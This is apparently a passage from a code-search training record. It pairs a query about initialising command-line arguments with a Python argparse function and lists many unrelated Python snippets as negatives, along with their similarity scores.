not phases_found:\n print(\"Splitting the files into train, valid, and test sets.\")\n for phase, fold_ix in self.fold_split.items():\n img_dir1 = self.save_dir / \"Lizard_Images1\"\n img_dir2 = self.save_dir / \"Lizard_Images2\"\n label_dir = self.save_dir / \"Lizard_Labels\"\n save_im_dir = self.save_dir / phase / \"images\"\n save_mask_dir = self.save_dir / phase / \"labels\"\n\n self._split_to_fold(\n img_dir1,\n img_dir2,\n label_dir,\n save_im_dir,\n save_mask_dir,\n fold_ix,\n not rm_orig,\n )\n else:\n print(\n \"Found splitted Lizard data. \"\n \"If in need of a re-download, please empty the `save_dir` folder.\"\n )\n\n if rm_orig:\n for d in self.save_dir.iterdir():\n if \"lizard\" in d.name.lower() or \"macosx\" in d.name.lower():\n shutil.rmtree(d)\n\n if tiling and not patches_found:\n print(\"Patch the data... This will take a while...\")\n for phase in self.fold_split.keys():\n save_im_dir = self.save_dir / phase / \"images\"\n save_mask_dir = self.save_dir / phase / \"labels\"\n\n if self.dataset_type == \"hdf5\":\n sdir = self.save_dir / phase / f\"{phase}_patches\"\n sdir.mkdir(parents=True, exist_ok=True)\n writer = HDF5Writer(\n in_dir_im=save_im_dir,\n in_dir_mask=save_mask_dir,\n save_dir=sdir,\n file_name=f\"lizard_{phase}.h5\",\n patch_size=self.patch_size,\n stride=self.stride,\n transforms=[\"rigid\"],\n )\n else:\n sdir_im = self.save_dir / phase / f\"{phase}_im_patches\"\n sdir_mask = self.save_dir / phase / f\"{phase}_mask_patches\"\n sdir_im.mkdir(parents=True, exist_ok=True)\n sdir_mask.mkdir(parents=True, exist_ok=True)\n writer = FolderWriter(\n in_dir_im=save_im_dir,\n in_dir_mask=save_mask_dir,\n save_dir_im=sdir_im,\n save_dir_mask=sdir_mask,\n patch_size=self.patch_size,\n stride=self.stride,\n transforms=[\"rigid\"],\n )\n writer.write(tiling=True, pre_proc=self._process_label, msg=phase)\n else:\n print(\n \"Found processed Lizard data. \"\n \"If in need of a re-process, please empty the `save_dir` folders.\"\n )", "def __init__(self, options):\n print('Prepare the network and data.')\n self._options = options\n # Network.\n self._net = torch.nn.DataParallel(BCNN()).cuda()\n # Load the model from disk.\n #self._net.load_state_dict(torch.load(self._path['model']))\n print(self._net)\n # Criterion.\n self._criterion = torch.nn.CrossEntropyLoss().cuda()\n # Solver.\n self._solver = torch.optim.SGD(\n self._net.parameters(), lr=self._options['base_lr'],\n momentum=0.9, weight_decay=self._options['weight_decay'])\n self._scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n self._solver, mode='max', factor=0.1, patience=3, verbose=True,\n threshold=1e-4)\n\n self._train_path = os.path.join(self._options['text_path'],'train.txt')\n self._test_path = os.path.join(self._options['text_path'],'test.txt')\n\n #Dataloader\n transform = T.Compose([\n T.Resize(448), \n T.CenterCrop(448), \n T.ToTensor(), \n T.Normalize(mean=(0.485, 0.456, 0.406),\n std=(0.229, 0.224, 0.225)) \n ])\n\n train_data = Data( train_path = self._train_path, aug_path = options['aug_data'], img_transform=transform)\n\n\n\n test_data = Data( train_path = self._test_path, aug_path = options['aug_data'], img_transform=transform)\n\n\n\n self._train_loader = torch.utils.data.DataLoader(dataset=train_data,\n batch_size=self._options['batch_size'],drop_last=True, pin_memory=True,\n shuffle=True,num_workers=4)\n\n self._test_loader = torch.utils.data.DataLoader(dataset=test_data,\n batch_size=self._options['batch_size'],pin_memory=True,\n shuffle=False,num_workers=4)", "def load_all(): \n training_data = dict() \n for i in range(7):\n training_data[i+1] = load_data(i+1) \n\n return training_data", "def __init__(self, data_loader,\n data_train,\n data_test,\n dataset_name,\n model_kind,\n transaction_cost=0.0,\n BATCH_SIZE=30,\n GAMMA=0.7,\n ReplayMemorySize=50,\n TARGET_UPDATE=5,\n n_step=10,\n window_size=20):\n self.data_train = data_train\n self.data_test = data_test\n self.DATASET_NAME = dataset_name\n self.BATCH_SIZE = BATCH_SIZE\n self.GAMMA = GAMMA\n self.ReplayMemorySize = ReplayMemorySize\n self.window_size = window_size\n self.model_kind = model_kind\n\n self.split_point = data_loader.split_point\n self.begin_date = data_loader.begin_date\n self.end_date = data_loader.end_date\n\n self.TARGET_UPDATE = TARGET_UPDATE\n self.n_step = n_step\n self.transaction_cost = transaction_cost\n\n self.memory = ReplayMemory(ReplayMemorySize)\n\n self.train_test_split = True if data_test is not None else False\n\n self.EPS_START = 0.9\n self.EPS_END = 0.05\n self.EPS_DECAY = 500\n\n self.steps_done = 0\n\n self.PATH = os.path.join(Path(os.path.abspath(os.path.dirname(__file__))).parent,\n f'Results/{self.DATASET_NAME}/'\n f'{self.model_kind}; '\n f'DATA_KIND({self.data_train.data_kind}); '\n f'BEGIN_DATE({self.begin_date}); '\n f'END_DATE({self.end_date}); '\n f'SPLIT_POINT({self.split_point}); '\n f'WindowSize({self.window_size}); '\n f'BATCH_SIZE{self.BATCH_SIZE}; '\n f'GAMMA{self.GAMMA}; '\n f'REPLAY_MEMORY_SIZE{self.ReplayMemorySize}; '\n f'TARGET_UPDATE{self.TARGET_UPDATE}; '\n f'N_STEP{self.n_step}')\n\n if not os.path.exists(self.PATH):\n os.makedirs(self.PATH)\n\n self.model_dir = os.path.join(self.PATH, f'model.pkl')", "def build_dataloader(bs, shfle):\n # change get_labels to correct version (classification vs regression)\n dataset = TensorDataset(rand_data(), get_labels())\n dataset = TensorDataset(rand_data(), get_regression_labels())\n\n return DataLoader(dataset, batch_size=bs, shuffle=shfle, num_workers=0)" ]
[ "0.68454164", "0.6782941", "0.67057943", "0.66403675", "0.65843046", "0.65607405", "0.65350705", "0.65200335", "0.6494558", "0.6458471", "0.6375916", "0.6352485", "0.63391966", "0.6334616", "0.6328361", "0.6314732", "0.6312712", "0.62332684", "0.62095624", "0.6204455", "0.62037885", "0.6193522", "0.61776704", "0.6177272", "0.617649", "0.6150083", "0.61468786", "0.6109438", "0.6103655", "0.610334", "0.60936505", "0.60868806", "0.6085787", "0.6077591", "0.6075107", "0.6067179", "0.6032412", "0.60206735", "0.6012645", "0.60022455", "0.5996328", "0.59960896", "0.5994449", "0.5985566", "0.5979145", "0.59753054", "0.5974127", "0.597141", "0.59430534", "0.59384704", "0.5929569", "0.5928563", "0.5926079", "0.5925887", "0.59235144", "0.592078", "0.5920379", "0.591959", "0.5915169", "0.5908723", "0.5908723", "0.5905615", "0.5894279", "0.5889429", "0.5888431", "0.58862364", "0.58852345", "0.58789504", "0.587634", "0.5870902", "0.5865679", "0.5863221", "0.5854959", "0.5845867", "0.5842063", "0.5840054", "0.58399147", "0.5829995", "0.5828404", "0.58274424", "0.58233255", "0.58158994", "0.58062136", "0.580486", "0.5801704", "0.57963496", "0.57934284", "0.5790182", "0.57876784", "0.5780892", "0.5780892", "0.5780892", "0.5780892", "0.5779102", "0.577784", "0.5777814", "0.57766914", "0.5776682", "0.5771022", "0.5770152", "0.57697946" ]
0.0
-1
Necessary initialisations for command line arguments
def initialise(): # Logfile for logging log_filename = alib.log_filename_init() if log_filename is None: print("\nError: Failed to initialise Log File Name. aborting\n") return alib.FAIL_GENERIC parser = argparse.ArgumentParser(description=""" Example command lines: -d DEBUG --ss c:/tmp/x.xlsx --ss "C:/work/sample doc/Out of Service Codes.xlsx" """, formatter_class=argparse.RawTextHelpFormatter) # --- DB parameters --- # def_dir = 'C:/work/stuff/' # m_def_dir = 'master_OneDrive_2017-04-07/Master Validated Templates by Club (Controlled)' # mc_def_dir = 'master_common_OneDrive_2017-04-07/Master Validated Common Data Templates (Controlled)' parser.add_argument('--club_dir', help='club files directory', default=None, required=False) parser.add_argument('--club_common_dir', help='club common files directory', default=None, required=False) parser.add_argument('--m_dir', help='master directory', default=None, required=False) parser.add_argument('--mc_dir', help='master common directory', default=None, required=False) parser.add_argument('--all_dir', help='directory containing all of the above', default=None, required=False) parser.add_argument('--quick_debug', help='only load cc and mc files, used for debugging only', default=None, action='store_true', required=False) # Add debug arguments parser.add_argument('-d', '--debug', help='Log messages verbosity: NONE (least), DEBUG (most)', choices=('NONE', 'CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'), default="INFO", required=False) # Sort though the arguments, ensure mandatory are populated args = alib.args_validate(parser, log_filename) return (args, log_filename)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialise(self, args, environ):", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. \"\n # \"Zip format\",\n # required=False)", "def setUp(self):\n self.parser = command_line.get_args()", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def init_args():\n parser = argparse.ArgumentParser(\n description=\"DeltaSherlock Client software.\")\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('-c', '--config', action='store', dest='config_file',\n default='./config.ini', help=\"Path to config file. [default: \\\n %(default)s]\")\n parser.add_argument('-d', '--daemon', action='store_true', dest='daemon',\n default=False, help=\"Run in daemon mode. [default: \\\n %(default)s]\")\n return parser.parse_args()", "def initialize(self, args):\n\t\tpass", "def main() -> None:\n init(args=sys.argv[1:])", "def setup_args(cls, parser):\n pass", "def initialize():\n\n parser = argparse.ArgumentParser(\n description='This function takes a gene count file, a gene name, and \\\n an output file as parameters, and creates a file with the \\\n sample IDs and counts for that gene.')\n parser.add_argument('-i',\n '--data',\n type=str,\n help='The file name of the dataset.',\n required=True)\n parser.add_argument('-g',\n '--gene',\n type=str,\n help='The name of the target gene.',\n required=True)\n parser.add_argument('-o',\n '--output',\n type=str,\n help='The file name of the output file.',\n required=True)\n\n args_parse = parser.parse_args()\n\n return args_parse", "def __init__(self):\n self.parser = argparse.ArgumentParser(prog='PROG')\n self.parser.add_argument(\"--idir\", action=\"store\",\n dest=\"idir\", default=\"\", help=\"Input data path\")\n self.parser.add_argument(\"--dates\", action=\"store\",\n dest=\"dates\", default=\"\", help=\"dates or dates-rante to read, e.g. YYYYMMDD-YYYYMMDD\")", "def prepare_arguments(self, parser):\n pass", "def _set_default_args(self):\n self._parser.add_argument(\"username\")\n self._parser.add_argument(\"password\")\n self._parser.add_argument(\n \"--start\",\n help=\"Start date for the scraper in iso format, eg: 2017-11-19\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--end\",\n help=\"End date for the scraper in iso format\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--skip-delete\",\n help=\"Delete the scraper folder in /tmp after run\",\n action=\"store_true\",\n )", "def _prepare(self):\n # Customize commandline arguments\n parser = argparse.ArgumentParser()\n self.initArgumentParser(parser, defaults=self.default_binding_overrides)\n self.__options = parser.parse_args()\n self.__bindings.update(args_util.parser_args_to_bindings(self.__options))\n\n self.start_logging()", "def init_args():\n parser = argparse.ArgumentParser(description='Create xls for Tom')\n parser.add_argument('start', metavar='N', type=int, help='starting '\n 'number')\n parser.add_argument('total_x', metavar='N', type=int,\n help='total number of x rows')\n parser.add_argument('total_y', metavar='N', type=int,\n help='total number of y columns')\n parser.add_argument('filename', metavar='NAME', default='test.csv',\n type=str, help='file name to write to, should end in '\n 'csv')\n return parser.parse_args()", "def setup_default_arguments(self):\n self.add_argument('--clean', action='store_true',\n help='Cleans all generated files.')", "def setup_cmd_args():\n parser = argparse.ArgumentParser(description=\"This program will query G-POD and COPHUB on the same datasets, in order to obtain the number of data results, compare them compile a report with the differences.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n # parser.add_argument(\"root_dir\", help=\"The root directory containing data to check\")\n # parser.add_argument(\"--workspace\", help=\"Set Workspace manually\")\n parser.add_argument(\"--outputlist\", help=\"Folder to write the output lists with the un-synced products.\", default=\"c:\\\\temp\\\\\")\n parser.add_argument(\"--daysback\", help=\"Report with a given number of days back from today\", default=0)\n parser.add_argument(\"--dataset\", help=\"Set which dataset to query (chose S3A_SR_1_SRA_A_PREOPS or S3B_SR_1_SRA_A_NTC)\")\n parser.add_argument(\"--startdate\", help=\" The Start Date (format: YYYY-MM-DD) \", default=\"2016-06-01\")\n parser.add_argument(\"--enddate\",help=\" The End Date (format: YYYY-MM-DD)\")\n parser.add_argument(\"--cphubuser\",help=\"COPHUB username\", required=True)\n parser.add_argument(\"--cphubpw\",help=\"COPHUB password\", required=True)\n parser.add_argument(\"-email\", type=str, help=\"Email to send the results\", action=\"append\")\n parser.add_argument('-t', action='store_true', help=\"Today as enddate. Otherwise the last day of the previous month is considered.\")\n parser.add_argument('-n', action='store_true', help=\"Normal numeric check\")\n parser.add_argument('-m', action='store_true', help=\"Monthly check with product listing.\")\n return parser.parse_args()", "def initialize():\n\n global cmdarg\n # Open syslog for error message tracking\n syslog.openlog(\"munin-chrony\", 0, syslog.LOG_DAEMON)\n\n # Try to get the command-line argument, if there is one (usually either\n # 'config' or nothing)\n try:\n cmdarg = sys.argv[1]\n except IndexError:\n # It's not actually an error if this is out of range -- it just means\n # there wasn't an argument, so don't run in config mode\n cmdarg = \"\"", "def initialize():\n\n parser = build_arg_parser()\n par = parser.parse_known_args()[0]\n\n # Main arguments.\n set('run_mode', par.run_mode)\n set('input_files', par.image)\n\n # Sub-parser specific arguments.\n if par.run_mode == 'train':\n\n set('batch_size', par.batch_size)\n set('drop', par.drop)\n set('epochs', par.epochs)\n set('model', par.model)\n set('level', par.level)\n set('vfrac', par.vfrac)\n set('data_augm', par.data_augm)\n set('summary', par.summary)\n set('outdir', par.outdir)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n set('discriminator', par.discriminator)\n\n elif par.run_mode == 'predict':\n\n set('tile_edge', par.edge)\n set('model', par.model)\n set('save_conv2d_kernels', par.save_conv2d_kernels) \n set('save_conv2d_outputs', par.save_conv2d_outputs) \n set('colormap', par.colormap)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n\n elif par.run_mode == 'diagnose': \n \n set('model', par.model) \n \n else:\n \n pass", "def init(self, args):\n return True", "def init():\n global opts\n global args\n \n # get options\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hvs:b:n:\", [\"--help\", \"--version\", \n \"--suffix=\", \"--begin=\", \"--name=\"])\n except getopt.GetoptError as err:\n print str(err)\n getHelp()\n sys.exit()\n else:\n parseOpts()", "def __init__(self, ignored_args = [], **common_options):\n self.ignored_args = ignored_args\n self.common_options = self._fix_argparse_dicts(common_options)", "def _pre_argument_parsing(self):\n pass", "def test_parse_arguments_default(self):\n self.assertEqual(self.args.python, sys.executable)\n self.assertEqual(self.args.pip_packages, [])\n self.assertEqual(self.args.number_of_threads, multiprocessing.cpu_count())\n self.assertEqual(self.args.cmake_installer,\n CMAKE_INSTALLER_URL_BY_HOST_PLATFORM.get(sys.platform))\n self.assertEqual(self.args.cmake_source_project_root,\n os.path.join(os.getcwd(), 'git', 'falken'))\n self.assertEqual(self.args.cmake_copybara_variable, 'FALKEN_DIR')\n self.assertIsNone(self.args.cmake_configure_args)\n self.assertEqual(self.args.cmake_generator,\n cmake_runner.CMakeRunner.default_generator())\n self.assertEqual(\n self.args.cmake_target_architecture,\n cmake_runner.CMakeRunner.default_architecture(\n cmake_runner.CMakeRunner.default_generator()))\n self.assertEqual(self.args.cmake_build_dir,\n os.path.join(os.getcwd(), 'build'))\n self.assertEqual(self.args.cmake_build_configs, CMAKE_DEFAULT_BUILD_CONFIGS)\n self.assertIsNone(self.args.cmake_package_configs)\n self.assertEqual(self.args.cmake_package_generator, 'ZIP')\n self.assertIsNone(self.args.cmake_test_regex)\n self.assertEqual(self.args.output_dir, 'output')\n self.assertIsNone(self.args.copy_artifacts)\n self.assertIsNone(self.args.zip_artifacts)", "def parse_arguments(args):", "def setup_args():\n parser = ParlaiParser()\n parser.add_argument(\n '-n',\n '--num-episodes',\n default=-1,\n type=int,\n help='Total number of episodes to convert, -1 to convert all examples',\n )\n parser.add_argument(\n '-of',\n '--outfile',\n default=None,\n type=str,\n help='Output file where to save, by default will be created in /tmp',\n )\n parser.add_argument(\n '-s1id', '--speaker-0-id', type=str, help='Speaker id of agent who speaks first'\n )\n parser.add_argument(\n '-s1id',\n '--speaker-1-id',\n type=str,\n help='Speaker id of agent who speaks second',\n )\n parser.add_argument(\n '--prepended-context',\n type='bool',\n default=False,\n help='specify if the context is prepended to the first act',\n )\n parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)\n parser.set_defaults(datatype='train:ordered')\n\n return parser", "def test_default_parse_args(self):\n self.assertEqual(self.args.router, poll.DEFAULT_ROUTER)\n self.assertEqual(self.args.port, poll.DEFAULT_PORT)\n self.assertEqual(self.args.interval, poll.DEFAULT_INTERVAL)\n self.assertEqual(self.args.community, poll.DEFAULT_COMMUNITY)\n self.assertEqual(self.args.iterations, poll.DEFAULT_ITERATIONS)", "def test_arg_parser_init(self):\n args = self.parser.parse_args(['init'])\n self.assertEqual(args.command, 'init')", "def init(*, args: List[str]) -> None:\n logs.show_presentation()\n execute.parse_args(args=args)", "def main(args):", "def main(args):", "def main(args=None):", "def main(args=None):", "def __init__(self, argv):\n self._argv = argv", "def get_cli_arguments(self):\n pass", "def __init__(self, argparser):\n super().__init__()\n argparser.add_argument(\n \"-b\", \"--config-seed\", dest=\"config_seed\",\n help=\"configuration seed/blob\",\n type=str, default=constants.DEFAULT_CONFIG_SEED\n )\n argparser.add_argument(\n \"-e\", \"--config-variable\", dest=\"config_variable\",\n help=\"name of environment variable with config\",\n type=str, default=constants.DEFAULT_CONFIG_ENV_KEY\n )\n argparser.add_argument(\n \"-c\", \"--config-file\", dest=\"config_file\",\n help=\"path to config file\",\n type=str, default=constants.DEFAULT_CONFIG_PATH\n )\n argparser.add_argument(\n \"-s\", \"--suite\", dest=\"suite\",\n help=\"test suite to run\",\n type=str\n )\n argparser.add_argument(\n \"-l\", \"--list-suites\", dest=\"list_suites\",\n help=\"list available test suites\",\n action=\"store_true\"\n )", "def __init__(self, commandline_args):\n self.commit = commandline_args['commit']\n self.registry = commandline_args['registry']\n self.version = commandline_args['xl_version']\n self.image_version = image_version(commandline_args['xl_version'], commandline_args['suffix'])", "def __init__(self, args: argparse.Namespace):\n self._args = args", "def _initialize_from_cookiecutter_args(self, cookiecutter_args: dict[str, str]):\n self.golden_tests = cookiecutter_args[\"add_golden\"] == \"y\"\n self.github_owner = cookiecutter_args[\"github_owner\"]\n # Allow copyright holder and copyright year to be missing in the cookiecutter\n # args. Fallback to VSHN AG <info@vshn.ch> and the current year here.\n self.copyright_holder = cookiecutter_args.get(\n \"copyright_holder\", \"VSHN AG <info@vshn.ch>\"\n )\n self.copyright_year = cookiecutter_args.get(\"copyright_year\")\n if \"test_cases\" in cookiecutter_args:\n self.test_cases = cookiecutter_args[\"test_cases\"].split(\" \")\n else:\n self.test_cases = [\"defaults\"]\n\n return False", "def setup():\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--rows\", type=int, default=10, help=\"Number of rows to generate in demo file\")\n parser.add_argument(\"--filename\", type=str, default=\"..//data//demo.csv\", help=\"Filename of demo data\")\n parser.add_argument(\"--search_term\", type=str, default=\"Street\", help=\"Search term to look for in address info\")\n args = parser.parse_args()\n # generate_data_file(args.filename, args.rows)\n return args\n except Exception as e:\n print(e)\n exit(-1)", "def _init_parser():\n\t\n\t_parser = argparse.ArgumentParser()\n\t_parser.add_argument(\"--pull\", help=\"pull scripts from UR3\", action=\"store_true\")\n\t_parser.add_argument(\"--create\", help=\"create data base from script files\", action=\"store_true\")\n\t_parser.add_argument(\"--clear\", help=\"clear all data base\", action=\"store_true\")\n\treturn _parser", "def setUp(self):\n\n self.niceArgV = (\"--long Alpha -n Beta \"\n \"--shortless Gamma -f --myflag \"\n \"--myparam Tofu\").split()\n\n self.nice = WellBehaved()\n\n self.nice.parseOptions(self.niceArgV)", "def __init__(self):\n self.config = get_config()\n self.options, self.arguments = get_options(self.config)\n if self.get_bool(\"cache\") and self.get_bool(\"cache_search\") \\\n and not self.get_bool(\"longlist\"):\n integrate_search_cache(\n self.config,\n self.get(\"cachedir\"),\n self.get(\"setpath\")\n )\n if not self.arguments:\n if \"id\" in self.options.__dict__ \\\n and self.options.__dict__[\"id\"]:\n self.arguments.append( self.options.__dict__[\"id\"] )\n del( self.options.__dict__[\"id\"] )\n import sys\n message = \"WARNING: the --id option is deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)\n elif \"city\" in self.options.__dict__ \\\n and self.options.__dict__[\"city\"] \\\n and \"st\" in self.options.__dict__ \\\n and self.options.__dict__[\"st\"]:\n self.arguments.append(\n \"^%s city, %s\" % (\n self.options.__dict__[\"city\"],\n self.options.__dict__[\"st\"]\n )\n )\n del( self.options.__dict__[\"city\"] )\n del( self.options.__dict__[\"st\"] )\n import sys\n message = \"WARNING: the --city/--st options are deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)", "def command_line_arguments():\n\n try:\n parser = argparse.ArgumentParser(description='Log Handler/Cleaner/Copier for Idemia DocAuth')\n\n # Add required arguments.\n parser.add_argument('action', choices=['clean', 'download'], type=str, help='clean or download')\n\n # Parse the arguments\n args = parser.parse_args()\n\n return args\n\n except Exception as err:\n print(err)\n return", "def __init__(self, *args, **kwargs):\n argparse.ArgumentParser.__init__(self, *args, **kwargs)\n self.add_argument(\n '--log-level', env_var='COSA_LOG_LEVEL', default='info',\n choices=log._nameToLevel.keys(), help='Set the log level')", "def fill_args(cls, toolchain, parser):\n pass # pass must be overloaded (if required)", "def configure_commandline(cmdline_arguments: argparse.Namespace) -> Optional[Text]:", "def setup_args():\n parser = argparse.ArgumentParser(\n description=\"Take probe set and generate MSA for all variants for \"\n \"each gene\")\n\n parser.add_argument(\n \"-o\", \"--output_path\",\n help=\"Directory to save the output to. Default: Current Directory\",\n type=str, default='.')\n\n parser.add_argument(\n \"-p\", \"--probe\",\n help=\"Path to the probe fasta.\",\n type=str,\n required=True)\n\n parser.add_argument(\n \"-g\", \"--gene_refs\",\n help=\"Directory where gene references are located.\",\n required=True,\n type=str)\n\n args = parser.parse_args()\n return args", "def set_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser( # type: argparse.ArgumentParser\n description=r'''\n -----------------------------------\n < Pull DNA barcodes from FASTQ files >\n -----------------------------------\n /\n \\ ______/ V`-, /\n } /~~\n /_)^ --,r'\n |b |b\n ''',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False\n )\n # Arguments for verbosity and logging\n parser.add_argument( # Verbosity\n '-v',\n '--verbosity',\n dest='verbosity',\n type=str.lower,\n choices=_VERBOSITY_LEVELS,\n default=_VERBOSITY_DEFAULT,\n required=False,\n metavar='verbosity',\n help=\"Set the verbosity level, choose from '%s'; defaults to '%s'\" % (\"', '\".join(_VERBOSITY_LEVELS), _VERBOSITY_DEFAULT)\n )\n parser.add_argument( # Number of cores\n '--parallel',\n dest='num_cores',\n type=_num_cores,\n const=None,\n default=1,\n nargs='?',\n required=False,\n metavar='num jobs',\n help=\"Run %(prog)s in parallel; if passed, can optionally specify the number of jobs to run at once\"\n )\n parser.add_argument( # Output directory\n '-o',\n '--output-directory',\n dest='outdirectory',\n type=str,\n default=_OUTDIR_DEFAULT,\n required=False,\n metavar='output directory',\n help=\"Choose where all output files are to be stored; defaults to '%s'\" % _OUTDIR_DEFAULT\n )\n # Input arguments\n inputs = parser.add_argument_group(\n title='input arguments',\n description='Provide inputs for %(prog)s'\n )\n inputs.add_argument( # Forward FASTQ\n '-f',\n '--forward-fastq',\n dest='forward',\n type=str,\n default=None,\n required=True,\n metavar='FORWARD FASTQ',\n help=\"Provide a filepath for the forward/single FASTQ file\"\n )\n inputs.add_argument( # Reverse FASTQ\n '-r',\n '--reverse-fastq',\n dest='reverse',\n type=str,\n default=None,\n required=False,\n metavar='REVERSE FASTQ',\n help=\"Provide a filepath for the optional reverse FASTQ file\"\n )\n inputs.add_argument( # Sample sheet\n '-s',\n '--sample-sheet',\n dest='sample_sheet',\n type=str,\n default=None,\n required=True,\n metavar='SAMPLE SHEET',\n help=\"Provide a filepath for the sample sheet\"\n )\n inputs.add_argument( # Barcodes file\n '-b',\n '--barcodes',\n dest='barcodes',\n type=str,\n required=True,\n default=None,\n metavar='BARCODES',\n help=\"Provide a filepath for the barcodes CSV file\"\n )\n barcodes = parser.add_argument_group(\n title='barcode options',\n description=\"Set parameters for barcode demultiplexing\"\n )\n barcodes.add_argument( # Number of errors allowed\n '-e',\n '--error',\n dest='error',\n type=int,\n default=_ERROR_DEFAULT,\n required=False,\n metavar='ERROR',\n help=\"This is how many mismatches in the barcode we allowed before rejecting, defaults to %s\" % _ERROR_DEFAULT\n )\n return parser", "def __init__(self, *args, **kwargs):\n argparse.ArgumentParser.__init__(self, *args, **kwargs)\n self.add_argument(\n '--log-level', env_var='COSA_LOG_LEVEL', default='INFO',\n choices=log._nameToLevel.keys(), help='Set the log level')", "def __init__(self):\n self.exin = None\n self.dir = None\n self.arg_list = []\n # error 0 on success, 1 on error\n self.error = 1\n self.file_list = []\n self.parser = OptionParser()\n self.char_map = {'nul': '\\0', 'space': ' ',\n 'tab': '\\t', 'doublequote': '\"',\n 'singlequote': \"'\"}", "def __init__(self, *args, **kwargs):\n Cli.__init__(self, *args, **kwargs)\n # Set common arguments\n self.add_argument(\n '--build', default='latest',\n help='Override build id, defaults to latest')\n self.add_argument(\n '--buildroot', default='builds', help='Build diretory')\n self.add_argument(\n '--dump', default=False, action='store_true',\n help='Dump the manfiest and exit')", "def handle_cmdline_args():\n\n parser = argparse.ArgumentParser(\n description='Generate synthetic data from a specification in a json '\n 'file using the \"synth-method\" described in the json file. ')\n\n parser.add_argument(\n '-i', dest='infile', required=True,\n help='The input json file. Must contain a \"synth-method\" property')\n\n parser.add_argument(\n '-o', dest='outfile_prefix', required=True, help='The prefix of the output paths (data json and csv), relative to the QUIPP-pipeline root directory')\n\n args = parser.parse_args()\n return args", "def setUp(self):\n\n self.niceArgV = (\"--long Alpha -n Beta \"\n \"--shortless Gamma -f --myflag \"\n \"--myparam Tofu\").split()\n\n self.nice = WellBehaved()", "def _setup_argument_parser(self, argument_parser):\n pass", "def __init__(self):\n argus = docopt(__doc__, version = 'Analyse folder 1.0')\n self.directory = argus[\"<directory>\"]\n print(argus)", "def __init__(self, args):\n self.args = args", "def initialize_options(self):\n self.base_dir = getcwd()\n self.output_dir = getcwd()\n self.release = None\n self.tag_prefix = 'v'\n self.version = VERSION", "def test_with_empty_args(self):\n parser = Parser()\n args = parser.parser.parse_args([])\n self.assertFalse(args.config)\n self.assertFalse(args.verbose)\n self.assertFalse(args.quiet)", "def setup_parser(self, parser, args):\r\n\r\n pass", "def main_argv():\n main_parse_args(sys.argv[1:])", "def main_argv():\n main_parse_args(sys.argv[1:])", "def __init__(self):\n self.program_args = {}\n self.program_arg_order = []\n self.program_flags = {}\n self.program_flag_order = []\n self.validators = []\n self.advice_functions = {}\n #Register the pre-made validators\n self.register_validator(range_validator, range_validator_advice)\n self.register_validator(enum_validator, enum_validator_advice)\n self.register_validator(bool_validator, bool_validator_advice)\n #Add the quiet flag:\n self.add_program_flag('--quiet',\n FlagDefinition('quiet', None, 'Suppress non-essential output'))\n #Add the help flag\n self.add_program_flag('--help',\n FlagDefinition('help', print_usage, \"Display this notice\"))", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def _parse_args(self):\n parser = argparse.ArgumentParser()\n _, args = parser.parse_known_args()\n self.args = [a for a in args if a != '']", "def _configure_args(self, parser: ArgumentParser) -> ArgumentParser:\n pass", "def add_args(self, parser):", "def initialize_options(self):\n #Each user option must be listed here with their default value.\n self.pylint_rcfile = ''", "def _pre_setup(self, project, prog, version, usage, description, epilog,\n default_config_files, default_config_dirs):\n\n if prog is None:\n prog = os.path.basename(sys.argv[0])\n if prog.endswith(\".py\"):\n prog = prog[:-3]\n\n if default_config_files is None:\n default_config_files = find_config_files(project, prog)\n\n if default_config_dirs is None:\n default_config_dirs = find_config_dirs(project, prog)\n\n self._oparser = _CachedArgumentParser(\n prog=prog, usage=usage, description=description, epilog=epilog)\n\n if version is not None:\n self._oparser.add_parser_argument(self._oparser,\n '--version',\n action='version',\n version=version)\n\n return prog, default_config_files, default_config_dirs", "def default_argv():\n\n return ['--quick', # so no config file is loaded\n # Other defaults to minimize side effects on stdout\n '--colors=NoColor', 